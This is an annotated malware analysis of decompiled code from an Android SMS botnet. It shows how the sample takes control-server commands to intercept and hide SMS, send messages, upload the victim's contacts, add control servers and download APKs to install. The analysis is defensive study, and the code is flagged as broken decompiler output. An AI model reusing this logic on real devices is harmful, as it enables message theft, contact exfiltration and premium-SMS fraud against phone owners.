// Decompiled holder for one command response received from the HTTP control server.
// Every field is server-supplied configuration; executeCommands() reads the fields and acts on them.
// Defender's note: the field set doubles as a capability list for this sample
// (SMS interception/deletion/sending, contact upload, arbitrary HTTP requests, APK download).
public class ServerResponse
{ // catchSmsList drives filtering of received SMS (structure: SmsItem, below). Per the analyst's notes it mainly
// uses SmsItem.number and SmsItem.text: a received SMS that comes from a listed number or contains the listed
// content is treated as a sensitive message. The list may hold several source numbers / content patterns, and
// a value of "*" means "match anything". In effect the HTTP control channel updates the SMS-theft match rules.
public List<SmsItem> catchSmsList = new ArrayList();
// deleteSmsList has the same structure as catchSmsList; it is mainly used to delete SMS matching the given pattern.
public List<SmsItem> deleteSmsList = new ArrayList();
// The following control fields make the client request a page; the analyst guesses this is used for ad clicking.
public List<HttpParam> httpParamList = new ArrayList();
// Compared against "GET" and "POST" in executeCommands to choose the request helper.
public String httpRequestMethod = "";
public String httpRequestUrl = "";
// When non-empty, executeCommands stores this into Settings.saved.number (a control phone number, per the analyst).
public String number = "";
// NOTE(review): executeCommands clears Settings.saved.deleteSmsList near the check of this flag; the
// decompiled control flow is unreliable, so confirm exactly which lists the flag resets.
public boolean removeAllSmsFilters = false;
// When true, executeCommands clears Settings.saved.sendSmsResultList.
public boolean removeAllSmsResults = false;
// NOTE(review): not referenced in the visible code — purpose unconfirmed.
public boolean removeCurrentCatchFilter = false;
// sendContactList: boolean that tells the client whether to upload (steal) the contact list.
public boolean sendContactList = false;
// The list of SMS the client is told to send (destination phone and content). The analyst speculates
// this could serve SMS flooding or premium-subscription fraud.
public List<SmsItem> sendSmsList = new ArrayList();
// When non-empty, executeCommands appends this to Settings.saved.serverList (an additional control server).
public String server = "";
// Copied to MainApplication.updateScreen before UpdateActivity is started.
public ScreenItem updateScreen = new ScreenItem();
// URL of a new apk file to download.
public String updateUrl = "";
// NOTE(review): not referenced in the visible code — presumably a polling delay; confirm.
public long wait = 0L;
}
// One SMS rule/message entry shared by catchSmsList, deleteSmsList and sendSmsList.
// NOTE(review): @Attribute/@Element look like XML-binding annotations (the response is presumably
// deserialized from XML) — the imports are not shown, so confirm the framework.
public class SmsItem
{ @Attribute
// Identifier echoed back in SendSmsResult after a send attempt (see executeCommands).
public String id;
@Attribute
// NOTE(review): presumably the rule key reported with a caught message (CatchResult.key) — confirm.
public long key;
@Attribute
// Phone number: the sender to match for catch/delete rules, the destination for sendSmsList entries.
public String number;
@Element
// Message text: the content to match for catch/delete rules, the body for sendSmsList entries.
public String text;
@Attribute
// NOTE(review): not referenced in the visible code — meaning unconfirmed.
public Boolean toSms;
}
下面就是对ServerResponse的执行过程了。由于对response已经做了如上转换,所以控制命令就直接对着对应属性判断就可以了。其实最主要的功能,我已经加红标粗了,就是下载别的apk并安装。注意:下面的代码是反编译工具的输出,控制流没有被正确还原,其中的continue和break label并不代表真实的执行顺序,阅读时应按各字段对应的操作来理解。
// Applies one ServerResponse from the control server: each non-empty/true field triggers the matching action.
// NOTE(review): this is raw decompiler output whose control flow was NOT recovered. The "continue"
// statements and the "break label612/label613" jumps stand in for skipped branches and loop bodies; the
// statements after "break label612" inside the removeAllSmsResults block are the displaced bodies of the
// k/j/i loops. Read it as a list of field -> action pairs, not as executable Java.
public void executeCommands(ServerResponse paramServerResponse)
{
while (true)
{
int i;
try
{
paramServerResponse.printToOutStream();
if (paramServerResponse.server.length() <= 0)
continue;
// As the name suggests: add the new control server to the list, then persist the settings.
Settings.saved.serverList.add(paramServerResponse.server);
MainApplication.settings.save(this);
if (paramServerResponse.number.length() <= 0)
continue;
// As the name suggests: store the new control-server phone number, then persist the settings.
Settings.saved.number = paramServerResponse.number; MainApplication.settings.save(this);
if (!paramServerResponse.removeAllSmsFilters)
continue;
// What follows are operations on catchSmsList, deleteSmsList and sendSmsList, whose roles are described on
// ServerResponse. They are plain list additions/removals, so the analyst does not go into detail.
Settings.saved.deleteSmsList.clear();
MainApplication.settings.save(this);
if (paramServerResponse.catchSmsList.size() <= 0)
continue;
// k indexes catchSmsList; the loop body is the displaced "Settings.saved.catchSmsList.add(...)" further down.
int k = 0;
if (k < paramServerResponse.catchSmsList.size())
continue;
MainApplication.settings.save(this);
if (paramServerResponse.deleteSmsList.size() <= 0)
continue;
// j indexes deleteSmsList; the loop body is the displaced "Settings.saved.deleteSmsList.add(...)" further down.
int j = 0;
if (j < paramServerResponse.deleteSmsList.size())
continue;
MainApplication.settings.save(this);
if (paramServerResponse.sendSmsList.size() <= 0)
continue;
// i indexes sendSmsList; the loop body is the displaced sendSms(...) section further down.
i = 0;
if (i < paramServerResponse.sendSmsList.size())
continue;
MainApplication.settings.save(this);
if (paramServerResponse.httpRequestUrl.length() <= 0)
continue;
// This control command makes the client fetch a page; the analyst guesses it is used for ad clicking.
// The "POST" counterpart was displaced into the catch block below by the decompiler.
if (!paramServerResponse.httpRequestMethod.equals("GET"))
continue;
MainApplication.sendGetRequest(paramServerResponse.httpRequestUrl, paramServerResponse.httpParamList);
// sendContactList: boolean that tells the client whether to upload (steal) the contact list.
if (!paramServerResponse.sendContactList)
continue;
// Contacts are read, serialized to XML and sent to the server.
MainApplication.sendContactsToServer(this, MainApplication.contactsToXml(MainApplication.getContacts(this)));
if (paramServerResponse.updateUrl.length() <= 0)
continue;
ConnectivityManager localConnectivityManager = (ConnectivityManager)getSystemService("connectivity");
// Network type 1 is ConnectivityManager.TYPE_WIFI and 0 is TYPE_MOBILE: the download is skipped only when
// Wi-Fi is unavailable and mobile data is neither connected nor connecting.
if ((!localConnectivityManager.getNetworkInfo(1).isAvailable()) && (!localConnectivityManager.getNetworkInfo(0).isConnectedOrConnecting()))
continue;
// File name is the current epoch milliseconds plus ".apk".
String str = System.currentTimeMillis() + ".apk";
// This is the key part: the apk named by the server-supplied updateUrl is downloaded to the external SD
// card and UpdateActivity is started to install it. Per the analyst, installation still only succeeds if
// the user confirms on the permission screen.
// NOTE(review): in this listing the guard
//   if (!MainApplication.DownloadApk(paramServerResponse.updateUrl, str))
// was merged into the comment line, so the "continue" below presumably belongs to that guard.
// Defender's note: a "<epoch-millis>.apk" file under <external storage>/download/ is a visible artifact of this step.
continue;
MainApplication.updataApkPath = Environment.getExternalStorageDirectory() + "/download/" + str;
MainApplication.updateScreen = paramServerResponse.updateScreen;
Intent localIntent = new Intent(this, UpdateActivity.class);
// 268435456 == 0x10000000 == Intent.FLAG_ACTIVITY_NEW_TASK.
localIntent.addFlags(268435456);
startActivity(localIntent); if (paramServerResponse.removeAllSmsResults)
{
Settings.saved.sendSmsResultList.clear();
MainApplication.settings.save(this);
break label612;
// Displaced body of the k loop: copy each catch rule from the response into the saved settings.
Settings.saved.catchSmsList.add((SmsItem)paramServerResponse.catchSmsList.get(k));
k++;
continue;
// Displaced body of the j loop: copy each delete rule from the response into the saved settings.
Settings.saved.deleteSmsList.add((SmsItem)paramServerResponse.deleteSmsList.get(j));
j++;
continue;
// This is the sendSmsList handling mentioned earlier: each entry is sent here, and the outcome
// (true on success, false on failure) is recorded in sendSmsResultList under the entry's id.
SmsItem localSmsItem = (SmsItem)paramServerResponse.sendSmsList.get(i);
if (!sendSms(localSmsItem.number, localSmsItem.text))
continue;
Settings.saved.sendSmsResultList.add(new SendSmsResult(localSmsItem.id, true));
break label613;
Settings.saved.sendSmsResultList.add(new SendSmsResult(localSmsItem.id, false));
}
}
catch (Exception localException)
{
localException.printStackTrace();
break label612;
// Displaced "POST" branch of the HTTP request command (counterpart of the "GET" check above).
if (!paramServerResponse.httpRequestMethod.equals("POST"))
continue;
MainApplication.sendPostRequest(paramServerResponse.httpRequestUrl, paramServerResponse.httpParamList);
continue;
}
label612: return;
label613: i++;
}
}
基本上http botnet部分的命令接受与控制就是这个样子了。
其中对catchSmsList和deleteSmsList的利用是在SmsReciver中实现的。实质就是监听了sms的接收,然后进行了过滤。
// Broadcast receiver that inspects incoming SMS and applies the server-supplied catch/delete rules.
// NOTE(review): onReceive is raw decompiler output with unrecovered control flow (see the notes inside).
// Defender's note: a receiver that reads the "pdus" extra and calls abortBroadcast() is the observable
// pattern here; abortBroadcast() only has an effect on ordered broadcasts.
public class SmsReciver extends BroadcastReceiver
{
// Decodes every raw PDU in the intent extras (key "pdus") into an SmsMessage.
private SmsMessage[] getSmsMessages(Bundle paramBundle)
{
Object[] arrayOfObject = (Object[])paramBundle.get("pdus");
SmsMessage[] arrayOfSmsMessage = new SmsMessage[arrayOfObject.length];
for (int i = 0; ; i++)
{
// Loop exit: all PDUs converted.
if (i >= arrayOfObject.length)
return arrayOfSmsMessage;
arrayOfSmsMessage[i] = SmsMessage.createFromPdu((byte[])arrayOfObject[i]);
}
}
// Checks each received message against the catch and delete rules.
// i is the "suppress this broadcast" flag, j the message index.
public void onReceive(Context paramContext, Intent paramIntent)
{
SmsMessage[] arrayOfSmsMessage = getSmsMessages(paramIntent.getExtras());
int i = 0;
int j = 0;
while (true)
{
// NOTE(review): decompiler artifact — this "if" has an empty body, and the "return" after
// abortBroadcast() makes the statements below unreachable as printed. Presumably the original loops
// over all messages and calls abortBroadcast() at the end only when i was set; confirm against the bytecode.
if ((j < arrayOfSmsMessage.length) || (i != 0));
try
{
// Stops the ordered broadcast from reaching later receivers, presumably so the message never
// reaches the user's SMS app.
abortBroadcast();
return;
SmsMessage localSmsMessage = arrayOfSmsMessage[j];
String str1 = localSmsMessage.getOriginatingAddress();
String str2 = localSmsMessage.getMessageBody();
// Match against catchSmsList.
CatchResult localCatchResult = MainApplication.settings.isCatchMessage(str1, str2);
if (localCatchResult.result)
// On a match, MainService.start is called to send the message (sender, body and rule key) onward,
// as the analyst described earlier in the write-up.
MainService.start(paramContext, paramIntent, "catch", str1, str2, localCatchResult.key);
// Match against deleteSmsList. NOTE(review): isNewServer presumably recognises an SMS that carries a
// new control-server address — confirm in Settings. Either match marks the broadcast for suppression.
if ((MainApplication.settings.isNewServer(paramContext, str1, str2)) || (MainApplication.settings.isDeleteMessage(str1, str2)))
i = 1;
j++;
}
catch (Exception localException)
{
// NOTE(review): the endless loop around printStackTrace() is a decompiler artifact, not real behaviour.
while (true)
localException.printStackTrace();
}
}
}
}